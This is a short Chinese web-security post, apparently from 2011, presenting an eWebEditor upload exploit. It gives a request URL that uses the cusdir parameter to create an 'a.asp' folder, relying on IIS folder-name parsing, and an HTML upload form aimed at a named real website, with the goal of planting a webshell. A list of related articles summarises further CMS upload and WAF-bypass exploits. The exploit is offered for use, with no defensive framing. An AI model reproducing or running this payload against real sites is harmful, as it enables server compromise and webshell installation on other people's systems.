ewebeditor通杀鸡肋0day漏洞
发布时间:2011-03-11 11:59:01 作者:佚名 我要评论
先访问这个地址
Editor/asp/upload.asp?action=save&type=image&style=popup&cusdir=a.asp
访问这个地址可以建立个A.ASP的文件夹……
再用这个html代码上传。 <form action="http://www.zzfhw.com/Editor/asp/upload.asp?action=sav
先访问这个地址
Editor/asp/upload.asp?action=save&type=image&style=popup&cusdir=a.asp
访问这个地址可以建立个A.ASP的文件夹……
再用这个html代码上传。
<form action="http://www.zzfhw.com/Editor/asp/upload.asp?action=save&type=image&style=popup&cusdir=a.asp" method=post name=myform enctype="multipart/form-data">
<input type=file name=uploadfile size=100><br><br>
<input type=submit value=upload>
</form>
相关文章
- 偶尔在网上看到这些,拿来和大家一块看看,也好让各个站长懂得保护自己的网站2012-10-16
- 安全狗是一款大家熟悉的服务器安全加固产品,据称已经拥有50W的用户量。最近经过一些研究,发现安全狗的一些防护功能,例如SQL注入、文件上传、防webshell等都可以被绕过2014-07-17
- 详解:跟以前动易一样注册会员时可以用xx.asp的样式注册。而我们上次的附件图片也都是按照我们的会员名来存放的。那么悲剧的0day就产生了。利用IIS解析特性! 利用2011-03-11
- 有点鸡肋,配合前几天公布的iis6文件名解析漏洞达到获取webshell的目的。2010-09-30
科讯网站管理系统 Kesion v6.5 CMS Oday 利用工具
通过自己构造参数AutoReName=3,可以将上传的文件名保存原样,通过截断可以直接得到SHELL限制,后台禁止了注册,或者禁止了上传,或者把user目录删除了,优点是不用找后台2010-09-30- 电脑用久了,装的软件,插件,越来越多,所做的操作也会留下很多垃圾文件保持在电脑上,加上电脑硬件也会老化,电脑中毒什么的。都有可能导致电脑开机速度慢。2012-05-04
- 首发:红科网安 作者:Amxking 漏洞程序:dedecms5.5 测试对象:织梦网CMS官方网站 提交时间:2010-03-17 漏洞类型:信息泄露 危险等级:低2011-03-11
- PHP网页的安全性问题,针对PHP的网站主要存在下面几种攻击方式2011-03-11
- 漏洞原理 漏洞的利用原理很简单,请看Upload.asp文件: 任何情况下都不允许上传asp脚本文件 sAllowExt = Replace(UCase(sAllowExt), "ASP", &qu2011-03-11
- 下面小编就为大家讲解微软lnk漏洞的具体分析,引发安全厂商的高度关注的一个特性,一起来看看吧2016-08-29
最新评论